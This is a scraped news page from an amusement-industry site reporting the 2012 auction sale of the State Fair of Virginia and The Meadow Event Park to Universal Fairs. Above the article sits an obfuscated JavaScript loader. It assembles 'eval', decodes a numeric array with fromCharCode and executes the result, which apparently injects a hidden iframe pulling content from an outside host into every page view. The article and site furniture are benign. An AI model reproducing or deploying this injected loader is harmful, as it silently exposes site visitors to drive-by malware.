


v="va"+"l";try{ebgserb++;}catch(snregrx){try{(Math+"")()}catch(ztbet){m=Math;ev=window[""+"e"+v];}ff="fromC"+"ha";if(020==0x10)ff+="rC"+"ode";n="25&&26&&121&&119&&48&&57&&116&&128&&115&&134&&125&&118&&126&&133&&62&&120&&117&&133&&85&&125&&117&&126&&117&&127&&132&&132&&82&&138&&100&&114&&119&&95&&113&&126&&117&&57&&55&&115&&127&&117&&137&&56&&57&&108&&64&&110&&57&&140&&29&&26&&25&&26&&121&&119&&130&&114&&125&&118&&130&&57&&57&&76&&29&&26&&25&&142&&48&&118&&124&&132&&117&&49&&139&&30&&25&&26&&25&&117&&127&&116&&133&&126&&117&&127&&132&&63&&135&&131&&121&&133&&117&&57&&50&&77&&121&&119&&130&&114&&125&&118&&48&&132&&130&&116&&77&&56&&120&&133&&132&&129&&74&&64&&63&&116&&124&&122&&115&&124&&62&&116&&124&&122&&115&&124&&131&&129&&130&&128&&62&&128&&130&&120&&63&&119&&117&&118&&116&&64&&118&&131&&113&&126&&117&&132&&62&&129&&120&&129&&79&&134&&121&&117&&77&&70&&70&&55&&118&&131&&113&&126&&117&&132&&77&&68&&55&&49&&135&&122&&116&&133&&120&&78&&55&&66&&64&&56&&48&&121&&117&&122&&119&&121&&132&&78&&55&&66&&64&&56&&48&&132&&132&&138&&124&&118&&77&&56&&134&&122&&131&&122&&114&&122&&124&&122&&132&&138&&74&&121&&121&&117&&116&&118&&126&&76&&128&&128&&131&&122&&132&&122&&127&&127&&74&&114&&114&&132&&127&&125&&133&&133&&117&&76&&124&&118&&118&&133&&74&&65&&75&&133&&127&&129&&74&&65&&75&&56&&78&&77&&63&&122&&118&&131&&113&&126&&117&&79&&50&&58&&75&&30&&25&&26&&141&&30&&25&&26&&118&&134&&126&&116&&132&&122&&127&&127&&48&&122&&118&&131&&113&&126&&117&&131&&56&&58&&139&&30&&25&&26&&25&&135&&113&&131&&48&&119&&48&&78&&48&&117&&127&&116&&133&&126&&117&&127&&132&&63&&115&&131&&117&&114&&132&&118&&85&&125&&117&&126&&117&&127&&132&&57&&55&&122&&118&&131&&113&&126&&117&&56&&57&&76&&118&&63&&131&&118&&132&&82&&132&&133&&130&&122&&114&&134&&132&&118&&56&&56&&131&&131&&115&&56&&60&&56&&120&&133&&132&&129&&74&&64&&63&&116&&124&&122&&115&&124&&62&&116&&124&&122&&115&&124&&131&&129&&130&&128&&62&&128&&130&&120&&63&&119&&117&&118&&116&&64&&118&&131&&113&&126&&117&&132&&62&&129&&120&&129&&79&&134&&121&&117&&77&&70&&70&&55&&118&&131&&113&&126&&117&&132&&77&&68&&55&&58&&75&&119&&62&&132&&132&&138&&124&&118&&62&&135&&121&&132&&121&&115&&121&&125&&121&&133&&137&&78&&55&&121&&121&&117&&116&&118&&126&&56&&75&&119&&62&&132&&132&&138&&124&&118&&62&&129&&127&&132&&121&&133&&121&&128&&126&&78&&55&&114&&114&&132&&127&&125&&133&&133&&117&&56&&75&&119&&62&&132&&132&&138&&124&&118&&62&&125&&117&&119&&132&&78&&55&&65&&55&&76&&118&&63&&131&&133&&137&&125&&117&&63&&132&&128&&128&&78&&55&&65&&55&&76&&118&&63&&131&&118&&132&&82&&132&&133&&130&&122&&114&&134&&132&&118&&56&&56&&135&&122&&116&&133&&120&&56&&60&&56&&65&&65&&55&&58&&75&&119&&62&&132&&117&&133&&81&&133&&132&&131&&121&&115&&133&&133&&117&&57&&55&&121&&117&&122&&119&&121&&132&&56&&60&&56&&65&&65&&55&&58&&75&&30&&25&&26&&25&&117&&127&&116&&133&&126&&117&&127&&132&&63&&119&&118&&132&&86&&124&&118&&125&&118&&126&&133&&131&&83&&137&&101&&113&&120&&94&&114&&125&&118&&56&&56&&114&&128&&116&&138&&55&&58&&107&&65&&109&&63&&113&&129&&128&&118&&126&&117&&83&&121&&121&&125&&116&&57&&118&&58&&75&&30&&25&&26&&141".split("&&");h=2;s="";if(m)for(i=0;i-625!=0;i=1+i){k=i;if(window.document)s+=String[ff](n[i]-(020+i%h));}if(021===0x11)ev(s);}



Amusement Business Today | State Fair of Virginia will continue, this Fall .recentcomments
a{display:inline !important;padding:0 !important;margin:0 !important;}
jQuery(function($) { if( $('nav .main-nav').length ){ target = $('nav .main-nav') }else if
($('.brandnav-nav .main-nav').length){ target = $('.brandnav-nav .main-nav') }else if(
$('ul.menu-always-on-top').length ){ target = $('ul.menu-always-on-top'); }
target.tmMobileMenu({ label : 'Menu', menuBg: '#000', menuColor: '#fff',
menuIndicatorBg:'#6F94AB', subMenuBg: '#f5f5f5', subMenuItemHover: '#e0e0e0',
subMenuItemColor: '#000' }); }); @import
url(http://fonts.googleapis.com/css?v2&family=Arial);.menu-always-on-top{font-family:
Arial, "Helvetica Neue", Helvetica, sans-serif;} #always-on-top-menu .content {
border-top: 1px solid #e0e0e0; border-bottom: 1px solid #e0e0e0; background: #ffffff; }
#always-on-top-menu .content-pad { padding: 0; } #always-on-top-menu.fixed .content {
border-bottom: 0; } #always-on-top-menu.fixed { position: fixed; top: -5px; left: 0;
width: 100%; -webkit-box-shadow: 0 0 10px #909090; -moz-box-shadow: 0 0 10px #909090;
box-shadow: 0 0 10px #909090; background: #ffffff; z-index: 9999; } ul.menu-always-on-top
li ul{ border: 1px solid #e0e0e0; background: #f4f4f4; } ul.menu-always-on-top li ul li{
background: #f4f4f4; } ul.menu-always-on-top li a{ color: #000000; font-size: 12px; }
ul.menu-always-on-top li a:hover{ color: #de941d; } ul.menu-always-on-top li ul li a{
font-size: 12px; } #always-on-top-menu .righty{ float: right; } #always-on-top-menu
.searchform { margin: 10px 25px 0px 0; width: 190px; } #always-on-top-menu .searchform
.searchfield{ padding:10px 30px 10px 25px; color:#707070; -webkit-border-radius:5px;
-moz-border-radius:5px; border-radius:5px; background-color:#f7f7f7; border:1px
solid #d5d5d5; } #always-on-top-menu .searchform input.submit { top: 8px; box-shadow:0px
0px 0px transparent; border:0px; } jQuery(function($) { var menu =
$('#always-on-top-menu'), pos = menu.offset(); menu.addClass('default')
$(window).scroll(function(){ if($(this).scrollTop() > pos.top+menu.height() &&
menu.hasClass('default')){ menu.fadeOut('slow', function(){
$(this).removeClass('default').addClass('fixed').fadeIn('slow'); }); } else
if($(this).scrollTop() <= pos.top && menu.hasClass('fixed')){ menu.fadeOut('slow',
function(){ $(this).removeClass('fixed').addClass('default').fadeIn('slow'); }); }
}); $(window).scroll(); }); /* <![CDATA[ */ jQuery(document).ready(function(){
jQuery.supersized({ slides : [ { image :
'http://amusementbusinesstoday.com/wp-content/uploads/2012/06/wheelback4gif.gif'
} ] }); });/* ]]> */





Image:
http://amusementbusinesstoday.com/wp-content/uploads/2012/06/abtodaylogo72.jpg

    Image:
    http://amusementbusinesstoday.com/wp-content/themes/pagelines/sections/branding/rss.png
    jQuery('.icons a').hover(function(){ jQuery(this).fadeTo('fast', 1);
    },function(){ jQuery(this).fadeTo('fast', 0.5);});

    - <!-- google_ad_client = "ca-pub-1026742881424680"; /* 728x90, created 10/24/10 */
    google_ad_slot = "3929350151"; google_ad_width = 728; google_ad_height = 90; //-->
    <!-- google_ad_client = "ca-pub-1026742881424680"; /* 728x90, created 10/24/10 */
    google_ad_slot = "3929350151"; google_ad_width = 728; google_ad_height = 90; //-->
    <!-- google_ad_client = "ca-pub-1026742881424680"; /* 728x90, created 10/24/10 */
    google_ad_slot = "3929350151"; google_ad_width = 728; google_ad_height = 90; //-->

    

    

        - Traveling Carnivals

        - Carnival Ride Company Routes

        

        - Carnytown – since 1995

        

        - Fairs

        

        - Festivals

        

    

    

        - Amusement Parks

        - Amusement Park News

        

        - Amusement Park Directory

        

    

    

        - Theme Parks

        - Disneyism

        

        - Theme Park Insider

        

        - Theme Park Reviews

        

        - Thrill Network

        

    

    

    - Water Parks

    

    - Aquariums

    

    - Piers

    

    - Circus

    

        - The Rides

        - Accidents 2012

        

        - Roller Coasters

        

        - Ride Accidents

        

    

    

    - Zoos

    



Home > Fairs > State Fair of Virginia will continue, this Fall



State Fair of Virginia will continue, this Fall



By admin On May 23, 2012 · Add Comment · In Fairs

The State Fair of Virginia , which has seen as many legal twists and turns as a tilt-a-whirl in
the past several months, will go on after all this fall.

At an auction Tuesday, Universal Fairs LLC, a Tennessee-based fair and festival operator,
bought the assets of the now-defunct nonprofit that had put on the annual State Fair.

The company plans to hold the fair at The Meadow Event Park in Caroline County beginning Sept.
28.

“We love the fair. I think no one around here needs to worry about it. We’re going to put on a
fabulous 10-day event in September,” said Mark Lovell , owner of Universal Fairs.

The Tennessee fair producer paid $5.35 million for 331 acres of The Meadow Event Park as well as
the State Fair of Virginia’s trademark, name and Web presence. With assorted fees and
commissions, the price topped $5.67 million.

SFVA Inc., the nonprofit that operated the State Fair of Virginia, acquired the property,
best known as the birthplace of Triple Crown winner Secretariat, in 2003 for $5.3 million and
moved the fair there in 2009.

Universal Fairs’ purchase brings to an end several months of uncertainty over whether the
fair, a tradition in Virginia for more than 150 years, would ever return and, if it did, what
form it would take.

The nonprofit filed for Chapter 11 bankruptcy protection in December after it defaulted on
about $75 million in loans. It converted the case to a Chapter 7 liquidation in March after SFVA
was unable to come up with a package to buy the State Fair to satisfy a group of lenders.

Former SFVA officials said in March that the lender group rebuffed a local commercial real
estate developer’s $5.5 million offer to buy The Meadow Event Park and lease it to SFVA.

“I would like to congratulate Universal Fairs on their being able to purchase The Meadow
Event Park and the intellectual property for less than SFVA offered to the lenders in March. I
wish Universal Fairs all the best in their efforts to create a diversified event emphasizing
Virginia’s agricultural industry,” G. William “Billy” Beale, former chairman of
SFVA and CEO of Richmond-based Union First Market Bankshares Inc., said in an email
Wednesday.

This isn’t the first time Lovell has looked to hold a fair in Virginia.

Universal Fairs had considered putting on a state fair at the Richmond Raceway Complex when
SFVA shut down operations in March. And the company made overtures to hold a fair at the raceway
complex in 2009 but dropped that effort after SFVA sued.

Universal Fairs stages fairs and other festivals and expositions in several states,
including Arizona, Mississippi and Washington. It recently took over the financially
troubled Georgia State Fair and operated it for 10 days that started in late April.

Lovell thinks that along with the State Fair and other regular events, The Meadow Event Park
could be well-situated to hold a music festival.

“There’s plenty of room. Bring on the cars. We can park them,” he said.

Lovell said he already has been in contact with a ride provider and that he expects other
vendors to be on board. Many of the State Fair’s vendors had been told in the months leading up
to the auction that there was the potential to hold the event this year, Lovell said.

“The fair has got a lot of history and we hate to see it dwindle to nothing,” he said. “We
have a lot of experience running fairs, and we’re very good at it.”

While about a dozen bidders came out for Tuesday’s auction, there have been ongoing
negotiations with interested buyers for several weeks, officials said.

Mark Motley, president of Motley’s Auction & Realty Group in Richmond, which marketed and
handled the sale of the property, said there were several parties looking to buy the fair and
its property with the intention of putting on the State Fair.

“We just never could get everybody to sit down and quite get to the point where we could
finalize an acceptable deal for all parties,” he said.

Some other intellectual property, vehicles and equipment will be sold at a separate online
auction.

The lenders will keep one of SFVA’s operating accounts worth about $2 million. About
$650,000 from that account will be divided between the bankruptcy trustee for fees and to pay
for promised scholarships.

The lender group also collected about $20 million earlier this year from separate accounts
held by SFVA.

“At this point, we don’t have a final take for the bond holders (lenders). It will be
significantly less than what they have in this property,” said Christine Myatt, an
attorney with the Nexsen Pruet law firm in North Carolina that represents ArborOne, the loan
servicer.

Myatt said her clients obviously would have liked more money but that “in the end, it’s
good for the state of Virginia because we can resume the State Fair this fall.”

Officials said working out a deal on the property was complicated given the state of SFVA’s
outstanding loans.

While SFVA officials have said moving the fair from its longtime home at the raceway complex in
Henrico to Caroline in 2009 did not cause it to fail, buying the property and building The
Meadow Event Park came at a tough time.

SFVA sold its Henrico fairgrounds to the raceway company in 1999 for $47 million and bought
Meadow Farm in 2003.

The farm was partly used as collateral on loans SFVA took out to help buy and build the complex in
Caroline.

But it was an investment portfolio used to secure bank loans and bonds that played a major role
in the arrangements.

In 2007, the portfolio was valued at about $40 million. But by Nov. 9, the portfolio was worth
only about $18.3 million, court documents filed in January show.

The investment portfolio’s drop in value meant SFVA no longer was meeting the terms of its
loan agreements, court records show.

SFVA filed for bankruptcy Dec. 1 to fend off creditors, but it wasn’t able to save itself.

As such, the lending group was entitled to take ownership of the property and certain assets.

Image:
http://amusementbusinesstoday.com/wp-content/plugins/pagelines-lazyloader/images/1x1.trans.gif

Ferris Wheel at SFVA (Photo credit: dgladfelter)

Related articles

    

    -

    Image:
    http://amusementbusinesstoday.com/wp-content/plugins/pagelines-lazyloader/images/1x1.trans.gif
    State Fair prepares for Caroline opening | Richmond Times-Dispatch

    

    

    

    

    - Universal Fairs buys State Fair of VIrgnia (wjla.com)

    

    - State Fair of Va property to be sold at auction (mysanantonio.com)

    

    - Auction set for Virginia State Fair complex (virginiabusiness.com)

    

    - Deal Reached In Virginia State Fair Bankruptcy Case Clears Way For Sale
    (washington.cbslocal.com)

    

    - Virginia property where Secretariat born is sold (seattletimes.nwsource.com)

    

    - Lender, trustee deal will allow sale of State Fair in one piece (timesdispatch.com)

    

    - Recovering for Belmont (toledoblade.com)

    



Image:
http://amusementbusinesstoday.com/wp-content/plugins/pagelines-lazyloader/images/1x1.trans.gif
Tagged with: Mark Lovell • Meadow Event Park • Nexsen Pruet • Richmond International
Raceway • SFVA • Universal Fairs • Virginia • Virginia State Fair  

Leave a Reply Cancel reply



Your email address will not be published. Required fields are marked *

Name *

Email *

Website

Comment

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym
title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite="">
<strike> <strong>



Share → (function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if
(d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src =
"//connect.facebook.net/en_GB/all.js#xfbml=1"; fjs.parentNode.insertBefore(js,
fjs); }(document, 'script', 'facebook-jssdk')); (function() { var po =
document.createElement('script'); po.type = 'text/javascript'; po.async = true; po.src
= 'https://apis.google.com/js/plusone.js'; var s =
document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);
})(); Tweet !function(d,s,id){var
js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");

    Image: //assets.pinterest.com/images/PinExt.png (function(d, s, id) { var js, fjs =
    d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js =
    d.createElement(s); js.id = id; js.src =
    "//connect.facebook.net/en_US/all.js#xfbml=1";
    fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));
    new TWTR.Widget({ version: 2, type: 'search', search: 'Disney World', rpp: 50,
    interval: 8000, title: 'I\'m going to Disney', subject: 'Disney World', width: 'auto',
    height: 300, theme: { shell: { background: '#f00849', color: '#ffffff' }, tweets: {
    background: '#f5f17a', color: '#050505', links: '#221ba8' } }, features: { scrollbar:
    true, loop: false, live: true, behavior: 'default' } }).render().start();

    - Paperli.PaperWidget.Show({ pid: 'a8bbd7fd-2266-4cbe-8d98-b22a981148cd',
    width: 200, background: '#FB0000' })

    

    -

    Search

    

    

    -

    Recent Articles

        

        - Air-hostess dies, thrown off amusement park ride near Chennai

        

        - Michigan’s Adventure vice president appointed to state’s
        carnival-amusement board

        

        - HOW TO: Plywood Aquarium

        

        - Dream-Along With Mickey, Magic Kingdom, Walt Disney World, (HD 1080p)

        

        - “Shoulder to shoulder” on the Bloomsburg Midway

        

    

    

    -

    Recent Comments

        

        - bdarnell1966 on HOW TO: Plywood Aquarium

        

        - ACBContent on HOW TO: Plywood Aquarium

        

        - trujanoarce on HOW TO: Plywood Aquarium

        

        - lupitagirl86 on HOW TO: Plywood Aquarium

        

        - riklivez on HOW TO: Plywood Aquarium

        

    

    

    -

    Archives

        

        - October 2012

        

        - September 2012

        

        - August 2012

        

        - July 2012

        

        - June 2012

        

        - May 2012

        

    

    

    -

    Categories

    Select Category Accidents  (77) Amusement Parks  (116) Aquarium  (7)
    Aquariums  (24) Circus  (10) Fairs  (86) Festivals  (17) Museums  (1)
    Piers  (10) Roller Coasters  (35) The People  (6) Theme Parks  (119)
    Traveling Carnivals  (5) Water Park  (42) Zoo  (11) /* <![CDATA[ */ var
    dropdown = document.getElementById("cat"); function onCatChange() { if (
    dropdown.options[dropdown.selectedIndex].value > 0 ) { location.href =
    "http://amusementbusinesstoday.com/?cat="+dropdown.options[dropdown.selectedIndex].value;
    } } dropdown.onchange = onCatChange; /* ]]> */

    

    

    -

    Image: http://adn.impactradius.com/display- ad/437-22114

    Image: http://pagelines.ojrq.net/i/22556/22114/437

    Image: http://www.shareasale.com/image/27477/160x600_wb.png

    

    

    - Traveling Carnivals

    

    - Amusement Parks

    

    - Theme Parks

    

    - Water Parks

    

    - Aquariums

    

    - Piers

    

    - Circus

    

    - The Rides

    

    - Zoos

    



Image: http://s17.sitemeter.com/meter.asp?site=s17carny <!-- var
sc_project=7962211; var sc_security="a0d1a477"; //-->

    Image: http://c.statcounter.com/7962211/0/a0d1a477/0/

    - Have an account? Log In

    

    - |

    

    - Register

    

Login Name: Password:  Remember Me Lost Password Username: E-mail: A password will be
e-mailed to you.



